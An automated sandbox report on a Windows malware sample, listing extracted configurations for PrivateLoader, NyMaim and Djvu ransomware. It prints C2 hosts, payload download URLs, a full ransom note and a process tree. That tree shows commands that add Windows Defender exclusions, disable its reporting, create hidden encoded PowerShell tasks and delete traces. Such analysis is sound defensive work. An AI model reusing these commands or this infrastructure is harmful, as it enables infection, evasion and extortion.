Analysis

  • max time kernel
    44s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-08-2022 15:01

General

  • Target

    f0dc8fa1a18901ac46f4448e434c3885a456865a3a309.exe

  • Size

    400KB

  • MD5

    9519c85c644869f182927d93e8e25a33

  • SHA1

    eadc9026e041f7013056f80e068ecf95940ea060

  • SHA256

    f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b

  • SHA512

    dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23

Malware Config

Extracted

Family

privateloader

C2

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes
  • payload_url

    https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp

    https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://193.56.146.76/Proxytest.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

    http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

    https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

    http://185.215.113.208/ferrari.exe

    https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://mnbuiy.pw/adsli/note8876.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

    http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

    https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

    http://185.215.113.208/ferrari4.exe

Extracted

Family

nymaim

C2

208.67.104.9

212.192.241.16

Extracted

Family

djvu

C2

http://acacaca.org/test2/get.php

Attributes
  • extension

    .vvyu

  • offline_id

    rE5LpDv2ftYRXAo7bC18EpzfRMTHSGjgfyIMfZt1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://acacaca.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-QsoSRIeAK6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0531Jhyjd

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 10 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
  • NyMaim

    NyMaim is a malware with various capabilities written in C++ and first seen in 2013.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f0dc8fa1a18901ac46f4448e434c3885a456865a3a309.exe
    "C:\Users\Admin\AppData\Local\Temp\f0dc8fa1a18901ac46f4448e434c3885a456865a3a309.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Users\Admin\Documents\AzgAwziIH1ahUCaqCicO_tZP.exe
      "C:\Users\Admin\Documents\AzgAwziIH1ahUCaqCicO_tZP.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
        "C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:4312
      • C:\Users\Admin\Pictures\Adobe Films\WEFdanE.exe.exe
        "C:\Users\Admin\Pictures\Adobe Films\WEFdanE.exe.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\SysWOW64\where.exe
          where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
          4⤵
            PID:2164
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c cmd < Nell.vst & ping -n 5 localhost
            4⤵
              PID:4128
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                5⤵
                  PID:4900
            • C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe
              "C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe"
              3⤵
              • Executes dropped EXE
              PID:4284
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte04.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe" & exit
                4⤵
                  PID:1388
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "mixinte04.bmp.exe" /f
                    5⤵
                    • Kills process with taskkill
                    PID:2624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1364
                  4⤵
                  • Program crash
                  PID:4256
              • C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe
                "C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe"
                3⤵
                • Executes dropped EXE
                PID:3700
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 3700 -s 696
                  4⤵
                  • Program crash
                  PID:2196
              • C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
                "C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
                3⤵
                • Executes dropped EXE
                PID:3724
                • C:\Users\Admin\AppData\Local\Temp\7zS58E.tmp\Install.exe
                  .\Install.exe
                  4⤵
                    PID:4232
                    • C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe
                      .\Install.exe /S /site_id "525403"
                      5⤵
                        PID:4520
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                          6⤵
                            PID:4628
                            • C:\Windows\SysWOW64\cmd.exe
                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                              7⤵
                                PID:1988
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                  8⤵
                                    PID:3780
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                    8⤵
                                      PID:388
                                • C:\Windows\SysWOW64\forfiles.exe
                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                  6⤵
                                    PID:4844
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                      7⤵
                                        PID:4572
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                          8⤵
                                            PID:4480
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                            8⤵
                                              PID:1068
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gPOzenixK" /SC once /ST 12:03:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          6⤵
                                          • Creates scheduled task(s)
                                          PID:3768
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gPOzenixK"
                                          6⤵
                                            PID:5008
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gPOzenixK"
                                            6⤵
                                              PID:3560
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "bsAbafpwyZvVmVDlMF" /SC once /ST 15:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\pGKOFWR.exe\" Yz /site_id 525403 /S" /V1 /F
                                              6⤵
                                              • Creates scheduled task(s)
                                              PID:1052
                                      • C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of WriteProcessMemory
                                        PID:3752
                                        • C:\Windows\SysWOW64\where.exe
                                          where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
                                          4⤵
                                            PID:2608
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c cmd < Calore.sldm & ping -n 5 localhost
                                            4⤵
                                              PID:4992
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd
                                                5⤵
                                                  PID:4292
                                            • C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:2756
                                            • C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\build.exe.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:964
                                              • C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\build.exe.exe"
                                                4⤵
                                                  PID:4736
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Users\Admin\AppData\Local\2aaa4df3-5c8d-4c6c-8000-752569a3f998" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                    5⤵
                                                    • Modifies file permissions
                                                    PID:3596
                                                  • C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\build.exe.exe" --Admin IsNotAutoStart IsNotTask
                                                    5⤵
                                                      PID:4616
                                                      • C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\build.exe.exe" --Admin IsNotAutoStart IsNotTask
                                                        6⤵
                                                          PID:4140
                                                          • C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe
                                                            "C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe"
                                                            7⤵
                                                              PID:3264
                                                              • C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe
                                                                "C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe"
                                                                8⤵
                                                                  PID:452
                                                      • C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
                                                        3⤵
                                                          PID:4604
                                                          • C:\Users\Admin\AppData\Local\Temp\is-QJAB5.tmp\B2BCH2.exe.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-QJAB5.tmp\B2BCH2.exe.tmp" /SL5="$5017E,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
                                                            4⤵
                                                              PID:2076
                                                              • C:\Users\Admin\AppData\Local\Temp\is-TF04E.tmp\djkdj778_______.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-TF04E.tmp\djkdj778_______.exe" /S /UID=91
                                                                5⤵
                                                                  PID:1936
                                                                  • C:\Users\Admin\AppData\Local\Temp\7d-f6b2a-e3a-8ca8b-d86b09b7bedf3\Tukeshaemexo.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7d-f6b2a-e3a-8ca8b-d86b09b7bedf3\Tukeshaemexo.exe"
                                                                    6⤵
                                                                      PID:2224
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                        7⤵
                                                                          PID:2160
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff80f2f46f8,0x7ff80f2f4708,0x7ff80f2f4718
                                                                            8⤵
                                                                              PID:1544
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
                                                                              8⤵
                                                                                PID:5632
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
                                                                                8⤵
                                                                                  PID:5684
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
                                                                                  8⤵
                                                                                    PID:5740
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                                                                    8⤵
                                                                                      PID:6128
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
                                                                                      8⤵
                                                                                        PID:6088
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 /prefetch:8
                                                                                        8⤵
                                                                                          PID:3596
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                                                                                          8⤵
                                                                                            PID:6312
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
                                                                                            8⤵
                                                                                              PID:7036
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4164 /prefetch:8
                                                                                              8⤵
                                                                                                PID:6120
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3876 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:5808
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
                                                                                                  8⤵
                                                                                                    PID:2464
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
                                                                                                    8⤵
                                                                                                      PID:5016
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
                                                                                                      8⤵
                                                                                                        PID:956
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:1
                                                                                                        8⤵
                                                                                                          PID:1716
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:6372
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:4856
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                                                              8⤵
                                                                                                                PID:1888
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff796575460,0x7ff796575470,0x7ff796575480
                                                                                                                  9⤵
                                                                                                                    PID:4336
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,14916794999257360144,16952274511374538909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:4712
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\f8-fdad3-38f-f469e-334ea73ed6146\Wovaevyrufe.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\f8-fdad3-38f-f469e-334ea73ed6146\Wovaevyrufe.exe"
                                                                                                                6⤵
                                                                                                                  PID:2252
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55jh3uih.s3b\gcleaner.exe /mixfive & exit
                                                                                                                    7⤵
                                                                                                                      PID:2148
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\55jh3uih.s3b\gcleaner.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\55jh3uih.s3b\gcleaner.exe /mixfive
                                                                                                                        8⤵
                                                                                                                          PID:1988
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\55jh3uih.s3b\gcleaner.exe" & exit
                                                                                                                            9⤵
                                                                                                                              PID:6576
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im "gcleaner.exe" /f
                                                                                                                                10⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:7120
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 1480
                                                                                                                              9⤵
                                                                                                                              • Program crash
                                                                                                                              PID:6672
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22rga1rz.val\random.exe & exit
                                                                                                                          7⤵
                                                                                                                            PID:4444
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22rga1rz.val\random.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22rga1rz.val\random.exe
                                                                                                                              8⤵
                                                                                                                                PID:5408
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22rga1rz.val\random.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\22rga1rz.val\random.exe" -hq
                                                                                                                                  9⤵
                                                                                                                                    PID:6068
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ryigevqg.edv\CCikZMg.exe & exit
                                                                                                                                7⤵
                                                                                                                                  PID:2244
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ryigevqg.edv\CCikZMg.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ryigevqg.edv\CCikZMg.exe
                                                                                                                                    8⤵
                                                                                                                                      PID:5708
                                                                                                                                      • C:\Windows\SysWOW64\where.exe
